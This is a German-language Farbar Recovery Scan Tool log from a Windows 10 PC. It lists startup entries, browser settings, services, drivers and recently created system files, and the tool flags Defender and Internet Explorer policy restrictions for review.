(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\SMService.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(IObit) C:\Program Files (x86)\IObit\Classic Start\InstallServices.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.410_none_9e914f9d2d85dacb\TiWorker.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-05-15] (Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-26] (Logitech, Inc.)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [17406072 2017-01-24] (Logitech Inc.)
HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.)
HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [318128 2016-11-16] (Samsung Electronics Co., Ltd.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-21] (Oracle Corporation)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [MyDriveConnect.exe] => C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe [1986280 2017-07-07] (TomTom)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Steam] => G:\Program Files (x86)\Steam\steam.exe [3062560 2017-07-18] (Valve Corporation)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Update] => C:\Users\***\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-04-27] (Google Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [BingSvc] => C:\Users\***\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Dropbox Update] => C:\Users\***\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [World of Warships] => G:\Games\World_of_Warships\WargamingGameUpdater.exe [3136264 2017-06-02] (Wargaming.net)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Akamai NetSession Interface] => C:\Users\***\AppData\Local\Akamai\netsession_win.exe [4490200 2017-01-03] (Akamai Technologies, Inc.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Photos Backup] => C:\Users\***\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [3790936 2016-04-09] (Google, Inc)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Spotify Web Helper] => C:\Users\***\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
Tcpip\..\Interfaces\{f81baef3-2886-44c5-9a55-1cfe2ed39eeb}: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60
ManualProxies: 

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/
BHO: Kein Name -> {AF949550-9094-4807-95EC-D1C317803333} -> Keine Datei
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-06] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-06] (Oracle Corporation)

Edge: 
======
Edge HomeButtonPage: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001 -> hxxps://www.google.ch/

FireFox:
========
FF ProfilePath: C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default [2017-08-09]
FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-08-08] [ist nicht signiert]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-06] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-07-19] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-01] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=3 -> C:\Users\***\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: @tools.google.com/Google Update;version=9 -> C:\Users\***\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin -> C:\Users\***\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi.dll [2016-12-08] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1566530412-1856523912-1524002813-1001: SkypePlugin64 -> C:\Users\***\AppData\Local\SkypePlugin\7.29.0.73\npGatewayNpapi-x64.dll [2016-12-08] (Skype Technologies S.A.)

Chrome: 
=======
CHR HomePage: Default -> msn.com
CHR StartupUrls: Default -> "hxxps://www.google.ch/"
CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms}
CHR DefaultSearchKeyword: Default -> bing.com
CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms}
CHR Profile: C:\Users\***\AppData\Local\Google\Chrome\User Data\Default [2017-08-09]
CHR Extension: (Google*Übersetzer) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-08-01]
CHR Extension: (Google Präsentationen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-08-01]
CHR Extension: (Google Docs) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-01]
CHR Extension: (Google Drive) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-01]
CHR Extension: (YouTube) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-01]
CHR Extension: (Google Tabellen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-08-01]
CHR Extension: (Google Docs Offline) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-01]
CHR Extension: (Testen Sie Ihre Internet-Geschwindigkeit) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\hekhmbhledgahgpondpnaeaffoipehch [2017-08-01]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-01]
CHR Extension: (Deutsch Übersetzer) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohiojbnhbaoegegaajagfiekffejejih [2017-08-01]
CHR Extension: (YouTube™ Flash-HTML5) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\omimccinlhlkpjaeaocglgmkbelejlhj [2017-08-01]
CHR Extension: (Google Mail) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-01]
CHR Extension: (Chrome Media Router) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-01]
CHR Extension: (Skype-Anrufe) - C:\Users\***\AppData\Local\Google\Chrome\User Data\Default\Extensions\poghlonenmjdkfghdpfomojhhfggildk [2017-08-01]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [305664 2014-08-11] (Qualcomm Atheros) [Datei ist nicht signiert]
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1465352 2017-01-15] ()
S3 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [487488 2017-07-31] (GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [8163392 2017-07-15] (GOG.com)
S3 HiPatchService; G:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [Datei ist nicht signiert]
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-05-28] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel(R) Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2014-09-03] (Intel Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [178312 2015-09-26] (Intel Corporation)
S3 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [225400 2017-04-06] (Logitech Inc.)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [512960 2017-07-26] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-07-19] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [449984 2017-07-26] (NVIDIA Corporation)
S3 Origin Client Service; G:\Program Files (x86)\Origin\OriginClientService.exe [2169696 2017-07-11] (Electronic Arts)
R2 Origin Web Helper Service; G:\Program Files (x86)\Origin\OriginWebHelperService.exe [3149672 2017-07-11] (Electronic Arts)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [217736 2017-02-23] (Geek Software GmbH)
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [387584 2014-09-19] (Qualcomm Atheros) [Datei ist nicht signiert]
R2 SMService; C:\Program Files (x86)\IObit\Classic Start\SMService.exe [1066272 2016-11-15] (IObit)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation)
S2 DigitalWave.Update.Service; "C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe" [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 AVerPL33_x64; C:\WINDOWS\system32\DRIVERS\AVerPL33_x64.sys [1780992 2014-07-16] (AVerMedia TECHNOLOGIES, Inc.)
S3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [41176 2015-08-22] (Broadcom Corporation.)
S1 BfLwf; C:\WINDOWS\system32\DRIVERS\bwcW8x64.sys [97968 2014-09-11] (Qualcomm Atheros, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-16] (ELAN Microelectronic Corp.)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-03-15] (REALiX(tm))
S3 Ke2200; C:\WINDOWS\System32\drivers\e22w8x64.sys [130224 2014-03-27] (Qualcomm Atheros, Inc.)
R3 KillerEth; C:\WINDOWS\System32\drivers\e2xw10x64.sys [145920 2017-03-18] (Qualcomm Atheros, Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [67736 2017-01-24] (Logitech Inc.)
R1 MpKsl174ac0cd; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{1930F23C-426D-4967-B2BF-B8BF84D915B1}\MpKsl174ac0cd.sys [44928 2017-08-08] (Microsoft Corporation)
R1 MpKsla84e905b; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{A7D2BD46-1D78-4F16-85FF-98FC90F0D75A}\MpKsla84e905b.sys [44928 2017-08-09] (Microsoft Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_24ddebfb518b5a55\nvlddmkm.sys [15668664 2017-07-19] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-26] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-26] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation)
R3 SaiMini; C:\WINDOWS\System32\drivers\SaiMini.sys [23968 2016-08-06] (Saitek)
R3 SaiNtBus; C:\WINDOWS\system32\drivers\SaiBus.sys [51488 2016-08-06] (Saitek)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 USBADVAU; C:\WINDOWS\system32\drivers\cm11264.sys [4135936 2013-11-01] (C-Media Electronics Inc) [Datei ist nicht signiert]
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-09 18:58 - 2017-08-09 18:58 - 002381824 _____ (Farbar) C:\Users\***\Desktop\FRST64.exe
2017-08-09 18:58 - 2017-08-09 18:58 - 000000000 ____D C:\Users\***\Desktop\FRST-OlderVersion
2017-08-09 18:40 - 2017-08-09 18:55 - 000000000 ____D C:\WINDOWS\Minidump
2017-08-08 23:04 - 2017-08-08 23:04 - 000000000 ____D C:\Users\***\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-08-08 19:26 - 2017-08-01 04:39 - 008319392 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-08-08 19:26 - 2017-08-01 04:38 - 000406544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-08-08 19:26 - 2017-08-01 04:38 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-08-08 19:26 - 2017-08-01 04:36 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-08-08 19:26 - 2017-08-01 04:36 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-08-08 19:26 - 2017-08-01 04:36 - 000119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-08-08 19:26 - 2017-08-01 04:35 - 000280472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe
2017-08-08 19:26 - 2017-08-01 04:35 - 000133904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2017-08-08 19:26 - 2017-08-01 04:34 - 000610584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-08-08 19:26 - 2017-08-01 04:34 - 000359552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2017-08-08 19:26 - 2017-08-01 04:34 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-08-08 19:26 - 2017-08-01 04:34 - 000168864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2017-08-08 19:26 - 2017-08-01 04:33 - 000473240 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-08-08 19:26 - 2017-08-01 04:32 - 002444704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-08-08 19:26 - 2017-08-01 04:32 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-08-08 19:26 - 2017-08-01 04:32 - 000712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-08-08 19:26 - 2017-08-01 04:31 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-08-08 19:26 - 2017-08-01 04:31 - 002645680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-08-08 19:26 - 2017-08-01 04:31 - 000212384 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-08-08 19:26 - 2017-08-01 04:31 - 000176024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-08-08 19:26 - 2017-08-01 04:30 - 000723680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-08-08 19:26 - 2017-08-01 04:30 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-08-08 19:26 - 2017-08-01 04:30 - 000410160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2017-08-08 19:26 - 2017-08-01 04:30 - 000315288 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2017-08-08 19:26 - 2017-08-01 04:30 - 000182688 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2017-08-08 19:26 - 2017-08-01 04:30 - 000143736 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2017-08-08 19:26 - 2017-08-01 04:30 - 000082336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmcl.sys
2017-08-08 19:26 - 2017-08-01 04:26 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-08-08 19:26 - 2017-08-01 04:20 - 002956288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-08-08 19:26 - 2017-08-01 04:20 - 000404480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2017-08-08 19:26 - 2017-08-01 04:20 - 000154624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE
2017-08-08 19:26 - 2017-08-01 04:18 - 013841408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-08-08 19:26 - 2017-08-01 04:18 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-08-08 19:26 - 2017-08-01 04:17 - 000034816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tokenbinding.dll
2017-08-08 19:26 - 2017-08-01 04:16 - 000080896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2017-08-08 19:26 - 2017-08-01 04:14 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sscore.dll
2017-08-08 19:26 - 2017-08-01 04:13 - 020504064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-08-08 19:26 - 2017-08-01 04:13 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-08-08 19:26 - 2017-08-01 04:13 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdeploy.dll
2017-08-08 19:26 - 2017-08-01 04:12 - 019336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-08-08 19:26 - 2017-08-01 04:12 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-08-08 19:26 - 2017-08-01 04:10 - 000358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-08-08 19:26 - 2017-08-01 04:09 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-08-08 19:26 - 2017-08-01 04:08 - 000267264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncryptprov.dll
2017-08-08 19:26 - 2017-08-01 04:07 - 011870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-08-08 19:26 - 2017-08-01 04:07 - 005961728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-08-08 19:26 - 2017-08-01 04:07 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-08-08 19:26 - 2017-08-01 04:06 - 000798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-08-08 19:26 - 2017-08-01 04:04 - 006269440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-08-08 19:26 - 2017-08-01 04:04 - 003656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-08-08 19:26 - 2017-08-01 04:03 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-08-08 19:26 - 2017-08-01 03:57 - 023677952 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-08-08 19:26 - 2017-08-01 03:45 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-08-08 19:26 - 2017-08-01 03:45 - 001275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2017-08-08 19:26 - 2017-08-01 03:45 - 000462848 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2017-08-08 19:26 - 2017-08-01 03:45 - 000092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2017-08-08 19:26 - 2017-08-01 03:44 - 000184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2017-08-08 19:26 - 2017-08-01 03:44 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmclr.sys
2017-08-08 19:26 - 2017-08-01 03:44 - 000077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
